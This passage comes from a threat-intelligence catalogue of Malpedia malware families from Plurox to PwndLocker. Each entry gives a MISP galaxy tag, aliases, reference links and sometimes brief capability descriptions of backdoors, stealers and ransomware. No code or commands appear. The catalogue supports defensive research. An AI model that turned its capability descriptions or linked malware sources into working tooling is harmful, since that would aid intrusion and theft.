https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/
http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html

Plurox

The tag is: misp-galaxy:malpedia="Plurox"

Plurox is also known as:

Table 2389. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.plurox
https://securelist.com/plurox-modular-backdoor/91213/
https://sysopfb.github.io/malware,/crypters/2019/09/23/Plurox-packer-layer-unpacked.html

pngdowner

The tag is: misp-galaxy:malpedia="pngdowner"

pngdowner is also known as:

Table 2390. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pngdowner
https://www.iocbucket.com/iocs/7f7999ab7f223409ea9ea10cff82b064ce2a1a31

PocoDown

uses POCO C++ cross-platform library, Xor-based string obfuscation, SSL library code and string overlap with Xtunnel, infrastructure overlap with X-Agent, probably in use since mid-2018

The tag is: misp-galaxy:malpedia="PocoDown"

PocoDown is also known as:

Blitz
PocoDownloader

Table 2391. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pocodown
https://threatvector.cylance.com/en_us/home/inside-the-apt28-dll-backdoor-blitz.html
https://twitter.com/cyb3rops/status/1129653190444703744
https://threatvector.cylance.com/en_us/home/flirting-with-ida-and-apt28.html

poisonplug

According to FireEye, POISONPLUG is a highly obfuscated modular backdoor with plug-in capabilities. The malware is capable of registry or service persistence, self-removal, plug-in execution, and network connection forwarding. POISONPLUG has been observed using social platforms to host encoded C&C commands.

The tag is: misp-galaxy:malpedia="poisonplug"

poisonplug is also known as:

Barlaiy

Table 2392. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.poisonplug
https://content.fireeye.com/apt-41/rpt-apt41/
https://securelist.com/apt-trends-report-q3-2020/99204/
https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf
https://www.fireeye.com/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage

Poison Ivy

The tag is: misp-galaxy:malpedia="Poison Ivy"

Poison Ivy is also known as:

SPIVY
pivy
poisonivy

Table 2393. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy
https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/
https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf
http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant
https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/
https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf
https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/
https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/
https://lab52.io/blog/icefog-apt-group-abusing-recent-conflict-between-iran-and-eeuu/
https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html
https://www.recordedfuture.com/china-linked-ta428-threat-group
https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology
https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf
https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/
https://www.youtube.com/watch?v=1WfPlgtfWnQ
https://www.secureworks.com/research/threat-profiles/aluminum-saratoga
https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment
https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers
https://vblocalhost.com/uploads/VB2020-20.pdf
https://community.riskiq.com/article/56fa1b2f
https://www.secureworks.com/research/threat-profiles/bronze-keystone
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf
https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii
https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/
https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/
https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2011/the_nitro_attacks.pdf
https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf
https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf
https://us-cert.cisa.gov/ncas/alerts/aa20-275a
https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf
https://www.secureworks.com/research/threat-profiles/bronze-union
https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html
https://www.secureworks.com/research/threat-profiles/bronze-firestone
http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf
https://www.secureworks.com/research/threat-profiles/bronze-riverside
http://blogs.360.cn/post/APT_C_01_en.html

Poison RAT

The tag is: misp-galaxy:malpedia="Poison RAT"

Poison RAT is also known as:

Table 2394. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_rat
https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/

Poldat

The tag is: misp-galaxy:malpedia="Poldat"

Poldat is also known as:

KABOB
Zlib

Table 2395. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.poldat
http://fireeyeday.com/1604/pdf/KeyNote_2.pdf
https://youtu.be/DDA2uSxjVWY?t=344
https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf

PolyglotDuke

The tag is: misp-galaxy:malpedia="PolyglotDuke"

PolyglotDuke is also known as:

Table 2396. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglotduke
https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/
https://www.welivesecurity.com/2019/10/17/operation-ghost-dukes-never-left/
https://www.secureworks.com/research/threat-profiles/iron-hemlock
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

Polyglot

The tag is: misp-galaxy:malpedia="Polyglot"

Polyglot is also known as:

Table 2397. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglot_ransom
https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/

Pony

The tag is: misp-galaxy:malpedia="Pony"

Pony is also known as:

Fareit
Siplog

Table 2398. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pony
http://www.secureworks.com/research/threat-profiles/gold-evergreen
http://www.secureworks.com/research/threat-profiles/gold-essex
https://www.youtube.com/watch?v=y8Z9KnL8s8s
https://www.youtube.com/watch?v=EyDiIAtdI[https://www.youtube.com/watch?v=EyDiIAtdI]
https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/
https://www.uperesia.com/analysis-of-a-packed-pony-downloader
https://www.secureworks.com/research/threat-profiles/gold-evergreen
https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/
https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf
https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf
https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry
https://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection
https://www.secureworks.com/research/threat-profiles/gold-galleon
http://www.secureworks.com/research/threat-profiles/gold-galleon
https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf
https://www.secureworks.com/research/threat-profiles/gold-essex
https://github.com/nyx0/Pony
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

PoohMilk Loader

The tag is: misp-galaxy:malpedia="PoohMilk Loader"

PoohMilk Loader is also known as:

Table 2399. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.poohmilk
https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/
http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html

PoorWeb

The tag is: misp-galaxy:malpedia="PoorWeb"

PoorWeb is also known as:

Table 2400. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.poorweb
https://securelist.com/apt-trends-report-q2-2018/86487/
https://fortiguard.com/resources/threat-brief/2019/05/10/fortiguard-threat-intelligence-brief-may-10-2019
https://asec.ahnlab.com/ko/18796/
https://blog.reversinglabs.com/blog/poorweb-exploiting-document-formats

Popcorn Time

The tag is: misp-galaxy:malpedia="Popcorn Time"

Popcorn Time is also known as:

Table 2401. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.popcorn_time

portless

The tag is: misp-galaxy:malpedia="portless"

portless is also known as:

Table 2402. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.portless
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf

poscardstealer

The tag is: misp-galaxy:malpedia="poscardstealer"

poscardstealer is also known as:

Table 2403. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.poscardstealer
http://pages.arbornetworks.com/rs/arbor/images/ASERT%20Threat%20Intelligence%20Brief%202014-06%20Uncovering%20PoS%20Malware%20and%20Attack%20Campaigns.pdf

PoshC2

The tag is: misp-galaxy:malpedia="PoshC2"

PoshC2 is also known as:

Table 2404. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.poshc2
https://www.secureworks.com/research/threat-profiles/cobalt-trinity
https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html
https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf
https://paper.seebug.org/1301/
https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/poshc2_apt_33.md
https://labs.nettitude.com/blog/detecting-poshc2-indicators-of-compromise/
https://github.com/nettitude/PoshC2_Python/
https://redcanary.com/blog/getsystem-offsec/
https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf
http://www.rewterz.com/rewterz-news/rewterz-threat-alert-iranian-apt-uses-job-scams-to-lure-targets
https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html

PoSlurp

The tag is: misp-galaxy:malpedia="PoSlurp"

PoSlurp is also known as:

PUNCHTRACK

Table 2405. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.poslurp
https://atr-blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/
https://norfolkinfosec.com/fuel-pumps-ii-poslurp-b/
https://twitter.com/just_windex/status/1162118585805758464
https://www.root9b.com/sites/default/files/whitepapers/PoS%20Malware%20ShellTea%20PoSlurp.pdf

Poulight Stealer

The tag is: misp-galaxy:malpedia="Poulight Stealer"

Poulight Stealer is also known as:

Poullight

Table 2406. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.poulight_stealer
https://blog.360totalsecurity.com/en/a-txt-file-can-steal-all-your-secrets/?web_view=true
https://www.carbonblack.com/blog/tau-threat-discovery-cryptocurrency-clipper-malware-evolves/
https://www.youtube.com/watch?v=MaPXDCq-Gf4
https://twitter.com/MBThreatIntel/status/1240389621638402049?s=20

Povlsomware

According to Trend Micro, Povlsomware (Ransom.MSIL.POVLSOM.THBAOBA) is a proof-of-concept (POC) ransomware first released in November 2020 which, according to their Github page, is used to “securely” test the ransomware protection capabilities of security vendor products.

The tag is: misp-galaxy:malpedia="Povlsomware"

Povlsomware is also known as:

Table 2407. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.povlsomware
https://www.trendmicro.com/en_us/research/21/c/povlsomware-ransomware-features-cobalt-strike-compatibility.html

Poweliks

The tag is: misp-galaxy:malpedia="Poweliks"

Poweliks is also known as:

Table 2408. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks
https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users
https://www.gdatasoftware.com/blog/2014/07/23947-poweliks-the-persistent-malware-without-a-file
https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/

POWERBAND

NET variant of ps1.powerton.

The tag is: misp-galaxy:malpedia="POWERBAND"

POWERBAND is also known as:

Table 2409. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.powerband
https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/

PowerCat

The tag is: misp-galaxy:malpedia="PowerCat"

PowerCat is also known as:

Table 2410. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.powercat
https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/
https://twitter.com/VK_Intel/status/1141540229951709184

PowerDuke

The tag is: misp-galaxy:malpedia="PowerDuke"

PowerDuke is also known as:

Table 2411. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.powerduke
https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/
https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/

powerkatz

The tag is: misp-galaxy:malpedia="powerkatz"

powerkatz is also known as:

Table 2412. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.powerkatz
https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/

PowerLoader

The tag is: misp-galaxy:malpedia="PowerLoader"

PowerLoader is also known as:

Table 2413. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.powerloader
https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html

PowerPool

The tag is: misp-galaxy:malpedia="PowerPool"

PowerPool is also known as:

Table 2414. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.powerpool
https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/

PowerShellRunner

The tag is: misp-galaxy:malpedia="PowerShellRunner"

PowerShellRunner is also known as:

Table 2415. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.powershellrunner
https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/
https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-04-13-Possible-Turla-PowerShell-Implant.ps1

Powersniff

A malware of the gozi group, developed on the base of isfb. It uses Office Macros and PowerShell in documents distributed in e-mail messages.

The tag is: misp-galaxy:malpedia="Powersniff"

Powersniff is also known as:

PUNCHBUGGY

Table 2416. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff
https://atr-blog.gigamon.com/2019/07/23/abadbabe-8badf00d-discovering-badhatch-and-a-detailed-look-at-fin8s-tooling/
https://lokalhost.pl/gozi_tree.txt
https://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/
https://content.fireeye.com/m-trends/rpt-m-trends-2017
https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf

PowerRatankba

QUICKRIDE.POWER is a PowerShell variant of the QUICKRIDE backdoor. Its payloads are often saved to C:\windows\temp\

The tag is: misp-galaxy:malpedia="PowerRatankba"

PowerRatankba is also known as:

QUICKRIDE.POWER

Table 2417. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.power_ratankba
https://content.fireeye.com/apt/rpt-apt38
https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/
https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf
https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf
https://www.flashpoint-intel.com/blog/disclosure-chilean-redbanc-intrusion-lazarus-ties/

prb_backdoor

The tag is: misp-galaxy:malpedia="prb_backdoor"

prb_backdoor is also known as:

Table 2418. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.prb_backdoor
https://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html

Predator The Thief

Predator is a feature-rich information stealer. It is sold on hacking forums as a bundle which includes: Payload builder and Command and Control web panel. It is able to grab passwords from browsers, replace cryptocurrency wallets, and take photos from the web-camera. It is developed by using a modular approach so that criminals may add more sophisticated tools on top of the it.

The tag is: misp-galaxy:malpedia="Predator The Thief"

Predator The Thief is also known as:

Table 2419. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.predator
https://www.fortinet.com/blog/threat-research/predator-the-thief-new-routes-delivery.html
https://fumik0.com/2019/12/25/lets-play-again-with-predator-the-thief/
https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/
https://fumik0.com/2018/10/15/predator-the-thief-in-depth-analysis-v2-3-5/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://securelist.com/a-predatory-tale/89779
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/
https://www.secureworks.com/research/threat-profiles/gold-galleon
https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf
https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware

Prikormka

The tag is: misp-galaxy:malpedia="Prikormka"

Prikormka is also known as:

Table 2420. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.prikormka
https://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf

Prilex

The tag is: misp-galaxy:malpedia="Prilex"

Prilex is also known as:

Table 2421. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.prilex
https://www.kaspersky.com/blog/chip-n-pin-cloning/21502
https://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-prilex-cutlet-maker-atm-malware-families/

PrincessLocker

The tag is: misp-galaxy:malpedia="PrincessLocker"

PrincessLocker is also known as:

Table 2422. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.princess_locker
https://www.bleepingcomputer.com/news/security/introducing-her-royal-highness-the-princess-locker-ransomware/
https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/
https://hshrzd.wordpress.com/2016/11/17/princess-locker-decryptor/

PRIVATELOG

Malware that abuses the Common Log File System (CLFS) to store/hide a second stage payload via registry transaction files.

The tag is: misp-galaxy:malpedia="PRIVATELOG"

PRIVATELOG is also known as:

Table 2423. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.privatelog
https://twitter.com/ESETresearch/status/1433819369784610828
https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html

Project Hook POS

The tag is: misp-galaxy:malpedia="Project Hook POS"

Project Hook POS is also known as:

Table 2424. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.project_hook
https://threatpost.com/dexter-project-hook-pos-malware-campaigns-persist/104655/

Prometheus

Ransomware written in .NET, apparently derived from the codebase of win.hakbit (Thanos) ransomware.

The tag is: misp-galaxy:malpedia="Prometheus"

Prometheus is also known as:

Table 2425. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.prometheus
https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware
https://medium.com/cycraft/prometheus-decryptor-6933e7bac1ea
https://twitter.com/inversecos/status/1441252744258461699?s=20
https://medium.com/s2wlab/prometheus-x-spook-prometheus-ransomware-rebranded-spook-ransomware-6f93bd8ab5dd
https://therecord.media/decryptor-released-for-prometheus-ransomware-victims/
https://id-ransomware.blogspot.com/2021/05/prometheus-ransomware.html
https://unit42.paloaltonetworks.com/prometheus-ransomware/

proteus

The tag is: misp-galaxy:malpedia="proteus"

proteus is also known as:

Table 2426. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.proteus
https://www.fortinet.com/blog/threat-research/a-new-all-in-one-botnet-proteus.html

ProtonBot

The tag is: misp-galaxy:malpedia="ProtonBot"

ProtonBot is also known as:

Table 2427. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.protonbot
https://fumik0.com/2019/05/24/overview-of-proton-bot-another-loader-in-the-wild/
https://www.youtube.com/watch?v=FttiysUZmDw

PsiX

According to Matthew Mesa, this is a modular bot. The name stems from the string PsiXMainModule in binaries until mid of September 2018.

In binaries, apart from BotModule and MainModule, references to the following Modules have be observed: BrowserModule BTCModule ComplexModule KeyLoggerModule OutlookModule ProcessModule RansomwareModule SkypeModule

The tag is: misp-galaxy:malpedia="PsiX"

PsiX is also known as:

Table 2428. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.psix
https://www.proofpoint.com/us/threat-insight/post/psixbot-now-using-google-dns-over-https-and-possible-new-sexploitation-module
https://blog.fox-it.com/2019/03/27/psixbot-the-evolution-of-a-modular-net-bot/
https://twitter.com/seckle_ch/status/1169558035649433600
https://www.proofpoint.com/us/threat-insight/post/psixbot-continues-evolve-updated-dns-infrastructure
https://twitter.com/mesa_matt/status/1035211747957923840

PSLogger

The tag is: misp-galaxy:malpedia="PSLogger"

PSLogger is also known as:

ECCENTRICBANDWAGON

Table 2429. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pslogger
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239a
https://norfolkinfosec.com/a-lazarus-keylogger-pslogger/

PC Surveillance System

Citizenlab notes that PC Surveillance System (PSS) is a commercial spyware product offered by Cyberbit and marketed to intelligence and law enforcement agencies.

The tag is: misp-galaxy:malpedia="PC Surveillance System"

PC Surveillance System is also known as:

Table 2430. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pss
https://citizenlab.ca/2017/12/champing-cyberbit-ethiopian-dissidents-targeted-commercial-spyware/

Pteranodon

The tag is: misp-galaxy:malpedia="Pteranodon"

Pteranodon is also known as:

Table 2431. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon
https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/
https://www.elastic.co/blog/playing-defense-against-gamaredon-group
https://blog.yoroi.company/research/cyberwarfare-a-deep-dive-into-the-latest-gamaredon-espionage-campaign/
https://labs.sentinelone.com/pro-russian-cyberspy-gamaredon-intensifies-ukrainian-security-targeting/
https://blog.threatstop.com/russian-apt-gamaredon-group
https://cert.gov.ua/news/42
https://www.vkremez.com/2019/01/lets-learn-deeper-dive-into-gamaredon.html
https://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/
https://cert.gov.ua/news/46

PubNubRAT

The tag is: misp-galaxy:malpedia="PubNubRAT"

PubNubRAT is also known as:

Table 2432. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pubnubrat
http://blog.alyac.co.kr/1853
https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html

Punkey POS

The tag is: misp-galaxy:malpedia="Punkey POS"

Punkey POS is also known as:

pospunk
punkeypos

Table 2433. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.punkey_pos
https://www.trustwave.com/Resources/SpiderLabs-Blog/New-POS-Malware-Emerges---Punkey/
https://www.pandasecurity.com/mediacenter/malware/punkeypos/

pupy (Windows)

The tag is: misp-galaxy:malpedia="pupy (Windows)"

pupy (Windows) is also known as:

Patpoopy

Table 2434. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy
https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage
https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/
https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html
https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
https://github.com/n1nj4sec/pupy
https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf
https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/
https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf

PureLocker

ransomware

The tag is: misp-galaxy:malpedia="PureLocker"

PureLocker is also known as:

Table 2435. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.purelocker
https://github.com/albertzsigovits/malware-notes/blob/master/PureLocker.md
https://exchange.xforce.ibmcloud.com/collection/99c7156cff70e1d8e1687ab7dadc8c0e
https://www.intezer.com/blog-purelocker-ransomware-being-used-in-targeted-attacks-against-servers/

win.purplefox

Purple Fox uses msi.dll function, 'MsiInstallProductA', to download and execute its payload. The payload is a .msi file that contains encrypted shellcode including 32-bit and 64-bit versions. once executed the system will be restarted and uses the 'PendingFileRenameOperations' registry to rename it’s components.

Upon restart the rootkit capability of Purple Fox is invoked. It creates a suspended svchost process and injects a DLL that will create a driver with the rootkit capability.

The latest version of Purple Fox abuses open-source code to enable it’s rootkit components, which includes hiding and protecting its files and registry entries. It also abuses a file utility software to hide its DLL component, which deters reverse engineering.

The tag is: misp-galaxy:malpedia="win.purplefox"

win.purplefox is also known as:

Table 2436. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.purplefox
https://nao-sec.org/2021/04/exploit-kit-still-sharpens-a-sword.html
https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/
https://s.tencent.com/research/report/1322.html
https://www.trendmicro.com/en_us/research/21/g/purplefox-using-wpad-to-targent-indonesian-users.html
https://blog.malwarebytes.com/trojans/2021/03/perkiler-malware-turns-to-smb-brute-force-to-spread/
https://threatresearch.ext.hp.com/purple-fox-exploit-kit-now-exploits-cve-2021-26411/
https://twitter.com/C0rk1_H/status/1412801973628272641?s=20
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/security-101-the-impact-of-cryptocurrency-mining-malware
https://www.guardicore.com/labs/purple-fox-rootkit-now-propagates-as-a-worm/

PurpleWave

The tag is: misp-galaxy:malpedia="PurpleWave"

PurpleWave is also known as:

Table 2437. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.purplewave
https://www.zscaler.com/blogs/research/purplewave-new-infostealer-russia

Pushdo

Pushdo is usually classified as a "downloader" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan.

The tag is: misp-galaxy:malpedia="Pushdo"

Pushdo is also known as:

Table 2438. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo
http://www.secureworks.com/research/threat-profiles/gold-essex
https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/
https://www.secureworks.com/research/threat-profiles/gold-essex
https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf
http://malware-traffic-analysis.net/2017/04/03/index2.html
https://www.secureworks.com/research/pushdo

Putabmow

The tag is: misp-galaxy:malpedia="Putabmow"

Putabmow is also known as:

Table 2439. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.putabmow

puzzlemaker

The dropper module is used to install two executables that pretend to be legitimate files belonging to Microsoft Windows OS. One of these files (%SYSTEM%\WmiPrvMon.exe) is registered as a service and is used as a launcher for the second executable. This second executable (%SYSTEM%\wmimon.dll) has the functionality of a remote shell and can be considered the main payload of the attack.

The tag is: misp-galaxy:malpedia="puzzlemaker"

puzzlemaker is also known as:

Table 2440. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.puzzlemaker
https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/

PvzOut

The tag is: misp-galaxy:malpedia="PvzOut"

PvzOut is also known as:

Table 2441. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pvzout
https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf

PwndLocker

